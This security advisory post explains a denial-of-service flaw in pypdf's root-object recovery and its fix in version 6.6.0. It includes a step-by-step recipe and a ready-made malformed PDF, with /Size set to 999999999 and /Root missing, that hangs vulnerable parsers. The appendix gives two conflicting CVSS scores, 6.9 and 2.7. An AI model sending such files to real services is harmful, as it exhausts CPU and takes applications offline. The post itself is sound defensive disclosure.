GHSA-4XC4-762W-M6CG

Infinite Loops in the Library: Breaking pypdf with Polite Parsing

Alon Barad
Software Engineer

Jan 11, 2026·5 min read

Executive Summary (TL;DR)

pypdf attempts to be helpful by recovering broken PDFs that lack a valid Root object. However, it decides how many objects to search based on the file's own metadata (`/Size`). An attacker can set this size to billions, forcing the library into a CPU-bound loop that is finite on paper but effectively endless in practice, all in search of a phantom object.

A Denial of Service vulnerability in the pypdf library caused by an uncontrolled loop during the recovery of malformed PDF files.

The Hook: Kindness Kills

There is an old adage in software engineering known as Postel's Law: "Be conservative in what you do, be liberal in what you accept from others." It sounds noble. It sounds robust. In the security world, however, we often call this "attack surface expansion."

pypdf, one of the most popular Python libraries for manipulating PDFs (used in everything from banking OCR pipelines to those trendy AI RAG chatbots), fell victim to its own benevolence. When you feed pypdf a pristine PDF, it works great. But when you feed it a broken PDF—specifically one missing its Document Catalog (the /Root)—it doesn't just error out. It tries to fix it for you.

This recovery mechanism is the heart of CVE-2026-22690. The library assumes that if the map is broken, it can just walk the entire territory to find the destination. The problem? The attacker gets to define the size of the territory.

The Flaw: Trusting the Map Legend

To understand this bug, you need to know a tiny bit about PDF structure. A PDF ends with a trailer dictionary. This trailer tells the parser where to find the xref table (the index of objects) and, crucially, which object is the /Root. The /Root is the entry point to the document hierarchy.

But what if the /Root key is missing? In default mode (non-strict), pypdf engages a fallback routine. It decides to iterate through every possible object ID to see if it looks like a Catalog.

Here is the fatal logic error: To know how many objects to scan, pypdf looks at the /Size key in the trailer. This key is supposed to represent the total number of objects in the file. Since the trailer is user-controlled input, an attacker can set /Size to 2,147,483,647 (INT_MAX) without actually providing that many objects.

When pypdf sees this, it essentially says, "Okay, I will now attempt to parse and validate 2 billion objects to find your missing root." It loops. It fails to find an object. It catches the exception. It loops again. This burns CPU cycles faster than a crypto miner. The loop is technically bounded by /Size, but at billions of iterations it locks up the thread for so long that it may as well be forever.
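To make the mismatch concrete, here is a rough pre-screening sketch that compares the declared /Size with the number of bytes actually in the file. It is a heuristic and not part of pypdf: the helper names `declared_size` and `size_is_implausible` are hypothetical, the regex only looks at plain-text `/Size` entries near the end of the file, and the rule "more objects than bytes" is an assumption chosen for illustration.

```python
import re
from typing import Optional

# Matches "/Size <integer>" as it appears in a plain-text trailer dictionary.
_SIZE_RE = re.compile(rb"/Size\s+(\d+)")


def declared_size(data: bytes, tail_bytes: int = 2048) -> Optional[int]:
    """Return the last /Size value found near the end of the file, if any."""
    matches = _SIZE_RE.findall(data[-tail_bytes:])
    return int(matches[-1]) if matches else None


def size_is_implausible(data: bytes) -> bool:
    """Heuristic: flag files that declare more objects than they have bytes."""
    size = declared_size(data)
    return size is not None and size > len(data)
```

A check like this does not replace the upstream fix; it only illustrates that the trailer's claim can be tested against something the attacker cannot fake, namely the length of the file.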

The Code: The Smoking Gun

Let's look at the vulnerable logic in pypdf/_reader.py. This is a classic case of an unbounded loop controlled by untrusted input.

# VULNERABLE CODE (Simplified)
# The 'nb' variable is taken directly from the file trailer
nb = cast(int, self.trailer.get("/Size", 0))
 
# The loop runs from 0 to the attacker-supplied size
for i in range(nb):
    try:
        # Attempt to parse object #i
        o = self.get_object(i + 1)
    except Exception:
        # If it fails, swallow the error and keep going
        o = None
    
    # Check if we accidentally found the Root
    if isinstance(o, DictionaryObject) and o.get("/Type") == "/Catalog":
        self._validated_root = o
        break

If I give you a file that is 1KB in size, but I set /Size to 100,000,000, this loop runs 100 million times. The try/except block makes it worse because exception handling in Python is relatively expensive compared to standard control flow.
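For a feel of the numbers, the sketch below times a loop that fails and swallows an exception on every pass, then extrapolates linearly to a declared /Size. The function `failing_lookup` is a hypothetical stand-in, not pypdf's `get_object`, which does considerably more work per call, so treat the result as a lower bound on an assumed model rather than a measurement of the library.

```python
import time


def failing_lookup(index: int) -> None:
    """Hypothetical stand-in for looking up an object that does not exist."""
    raise KeyError(index)


def seconds_per_failed_iteration(samples: int = 100_000) -> float:
    """Time a loop that fails and swallows the exception on every pass."""
    start = time.perf_counter()
    for i in range(samples):
        try:
            failing_lookup(i + 1)
        except Exception:
            pass  # same swallow-and-continue pattern as the vulnerable loop
    return (time.perf_counter() - start) / samples


def estimated_seconds(declared_size: int, per_iteration: float) -> float:
    """Extrapolate linearly to the attacker-declared /Size."""
    return declared_size * per_iteration


per_iter = seconds_per_failed_iteration()
print(f"~{estimated_seconds(100_000_000, per_iter):.0f} s for /Size 100,000,000")
```

Because the cost scales linearly with /Size, the attacker picks the runtime simply by picking the number.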

The fix, applied in commit 294165726b646bb7799be1cc787f593f2fdbcf45, introduces sanity. It caps the benevolence:

# PATCHED CODE
# Set a hard limit on how nice we are willing to be
limit = self.root_object_recovery_limit  # defaults to 10,000
 
for i in range(nb):
    if i > limit:
        raise LimitReachedError("Root object not found within limit")
    # ... existing logic ...

They also optimized the search mechanism, but the hard limit is the real mitigation here.
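The capped search can be sketched as a standalone function. This is an illustration of the pattern under stated assumptions, not the code from the pypdf commit: `find_catalog`, `RecoveryLimitError`, and the `get_object` callable are hypothetical names, and plain dicts stand in for pypdf's `DictionaryObject`.

```python
from typing import Callable, Optional


class RecoveryLimitError(Exception):
    """Hypothetical error raised when the scan budget is exhausted."""


def find_catalog(
    get_object: Callable[[int], object],
    declared_size: int,
    limit: int = 10_000,
) -> Optional[dict]:
    """Scan object IDs 1..declared_size for a /Catalog, giving up after `limit`."""
    for i in range(declared_size):
        if i >= limit:
            raise RecoveryLimitError(f"no /Catalog within first {limit} objects")
        try:
            obj = get_object(i + 1)
        except Exception:
            continue  # unreadable or missing object: skip it
        if isinstance(obj, dict) and obj.get("/Type") == "/Catalog":
            return obj
    return None


# Usage: a huge declared size no longer matters once the work is capped.
objects = {1: {"/Type": "/Page"}, 2: {"/Type": "/Catalog"}}
print(find_catalog(objects.__getitem__, declared_size=999_999_999))
```

The design point is that the budget comes from the caller, not from the file: the attacker still controls `declared_size`, but no longer controls how much work it buys.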

The Exploit: Crafting the Death PDF

You don't need complex fuzzing tools to exploit this. You just need a text editor. A PDF is partially ASCII, and the trailer is usually readable at the end of the file.

Here is the recipe for a denial-of-service payload:

  1. Take a valid, minimal PDF.
  2. Delete the /Root entry from the trailer dictionary.
  3. Set the /Size entry to a massive integer.

Your file might look like this:

%PDF-1.7
1 0 obj
<< /Type /Page >>
endobj
xref
0 1
0000000000 65535 f 
trailer
<<
  /Size 999999999  % <--- The Weapon
  % /Root is intentionally missing
>>
startxref
10
%%EOF

When a victim script runs:

from pypdf import PdfReader
reader = PdfReader("malicious.pdf")
# Triggers the property access
print(reader.pages[0]) 

The process will hang. On a single core, it pins the CPU to 100%. In a web server context (like Gunicorn or uWSGI), sending a few of these requests can tie up every worker, effectively taking the application offline.
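One general defense against this class of hang is to parse untrusted files in a child process with a wall-clock timeout, so a stuck parse cannot hold a worker hostage. The sketch below uses only the standard library in the parent; `run_isolated` and `COUNT_PAGES` are hypothetical names, and the child script assumes pypdf is installed in the same interpreter environment.

```python
import subprocess
import sys
from typing import Optional, Sequence


def run_isolated(code: str, args: Sequence[str], timeout: float) -> Optional[str]:
    """Run `code` in a child Python interpreter.

    Returns the child's stdout, or None on timeout or non-zero exit.
    """
    try:
        done = subprocess.run(
            [sys.executable, "-c", code, *args],
            capture_output=True,
            text=True,
            timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return None  # subprocess.run has already killed the child
    return done.stdout.strip() if done.returncode == 0 else None


# Child script: count the pages of the PDF passed as the first argument.
COUNT_PAGES = (
    "import sys\n"
    "from pypdf import PdfReader\n"
    "print(len(PdfReader(sys.argv[1]).pages))\n"
)
```

A caller might use `run_isolated(COUNT_PAGES, ["upload.pdf"], timeout=5.0)` and treat `None` as "reject this file". Spawning an interpreter per file has a cost, so this trades throughput for containment.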

The Mitigation: Stop the Bleeding

The primary fix is to upgrade pypdf. Version 6.6.0 introduces root_object_recovery_limit, which defaults to 10,000. This turns an effectively endless hang into a split-second search that fails gracefully.

If you cannot upgrade immediately (perhaps you are pinned to an older version due to dependencies), you have a configuration-level workaround: Strict Mode.

# Workaround for older versions
reader = PdfReader("untrusted.pdf", strict=True)

When strict=True is set, pypdf refuses to engage in the "guess the root object" game. If the /Root is missing from the trailer, it raises an exception immediately rather than entering the vulnerable recovery loop.

Note: This vulnerability highlights a crucial lesson for parser developers: Never loop on user-controlled integers without an upper bound. Trusting metadata to define loop constraints is a recipe for resource exhaustion.

Technical Appendix

CVSS Score: 6.9 / 10
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
EPSS Probability: 0.04%
Top 87% most exploited

Affected Systems

  - Python applications using pypdf < 6.6.0
  - Document processing pipelines
  - RAG (Retrieval-Augmented Generation) ingestion services
  - Email attachment scanners

Affected Versions Detail

Product: pypdf (py-pdf)
Affected Versions: < 6.6.0
Fixed Version: 6.6.0

Attribute: Detail
CWE ID: CWE-400
Attack Vector: Network (via File Upload)
CVSS v4: 2.7 (Low)
Impact: Denial of Service (CPU Exhaustion)
EPSS Score: 0.00042 (Low Probability)
Patch Status: Released (v6.6.0)

CWE-400: Uncontrolled Resource Consumption

The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.

Vulnerability Timeline

2026-01-09: Vulnerability Published
2026-01-09: Patch Merged (Commit 2941657)
2026-01-09: Version 6.6.0 Released